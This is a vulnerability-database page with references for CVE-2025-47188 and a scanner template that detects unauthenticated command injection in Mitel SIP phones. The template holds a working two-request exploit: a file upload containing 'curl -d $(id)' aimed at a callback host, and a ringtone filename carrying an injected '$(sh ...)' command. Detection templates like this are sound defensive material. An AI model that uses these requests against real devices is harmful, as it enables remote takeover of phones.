| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2025-47188 | 12 May 202501:52 | – | circl | |
| Mitel多款产品 安全漏洞 | 7 Aug 202500:00 | – | cnnvd | |
| CVE-2025-47188 | 7 Aug 202500:00 | – | cve | |
| CVE-2025-47188 | 7 Aug 202500:00 | – | cvelist | |
| EUVD-2025-23917 | 7 Aug 202500:00 | – | euvd | |
| CVE-2025-47188 | 7 Aug 202515:15 | – | nvd | |
| PT-2025-20724 | 12 May 202500:00 | – | ptsecurity | |
| CVE-2025-47188 | 9 Aug 202500:23 | – | redhatcve | |
| ⚡ Weekly Recap: Zero-Day Exploits, Developer Malware, IoT Botnets, and AI-Powered Scams | 12 May 202512:10 | – | thn | |
| VulnCheck KEV: CVE-2025-47188 | 21 Jul 202500:00 | – | vulncheck_kev |
id: CVE-2025-47188
info:
name: Mitel 6000 - OS Command Injection
severity: critical
author: matejsmycka
description: |
A vulnerability in the Mitel 6800 Series, 6900 Series, and 6900w Series SIP Phones through 6.4 SP4 (R6.4.0.4006), and the 6970 Conference Unit through 6.4 SP4 (R6.4.0.4006) or version V1 R0.1.0, could allow an unauthenticated attacker to conduct a command injection attack due to insufficient parameter sanitization. This template should be run on port 49249/tcp.
impact: |
Unauthenticated attackers can execute arbitrary commands, potentially disclosing or modifying sensitive data and disrupting device operation.
remediation: |
Update to the latest Mitel firmware version beyond 6.4 SP4.
reference:
- https://labs.infoguard.ch/posts/cve-2025-47188_mitel_phone_unauthenticated_rce/
- https://nvd.nist.gov/vuln/detail/CVE-2025-47188
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2025-47188
epss-score: 0.48492
epss-percentile: 0.98724
cpe: cpe:2.3:a:mitel:6000:*:*:*:*:*:*:*:*
metadata:
vendor: mitel
max-request: 2
fofa-query: icon_hash="-1940372141" || icon_hash="-447557905"
tags: cve,cve2025,rce,network,mitel,oast,oob,vkev
variables:
waf_file: "524946462400000057415645666d7420100000000100010044ac000088580100020010006461746100000000"
random_number: "{{rand_base(8)}}"
http:
- raw:
- |
POST /cgi-bin/webconfig?page=upload_ringtone&action=submit§ion=0&conn=0 HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----0ba2fc3a8c91370bd74c5f7ab65fda3f
------0ba2fc3a8c91370bd74c5f7ab65fda3f
Content-Disposition: form-data; name="upload_ringtone/newfile"; filename="{{random_number}}.txt"
{{hex_decode(waf_file)}}
curl -d $(id) {{interactsh-url}}
------0ba2fc3a8c91370bd74c5f7ab65fda3f--
- |
POST /cgi-bin/webconfig?page=upload_ringtone&action=submit§ion=1&conn=0 HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----0ba2fc3a8c91370bd74c5f7ab65fda3f
------0ba2fc3a8c91370bd74c5f7ab65fda3f
Content-Disposition: form-data; name="upload_ringtone/newfile"; filename="fake$(sh ${HOME}userdata${HOME}ringtone${HOME}{{random_number}}.txt).wav"
This is an invalid WAV file
------0ba2fc3a8c91370bd74c5f7ab65fda3f--
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body_1
words:
- "ringtone.html"
# digest: 4a0a00473045022033c86396ceeb4e012da91dffcae9af5ddc57d631366d62ac37ca4a6b96210ee60221008fc4709049afe85e80faa977457f79e1f624a847e2a2d2d75456564792fcd0d2:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation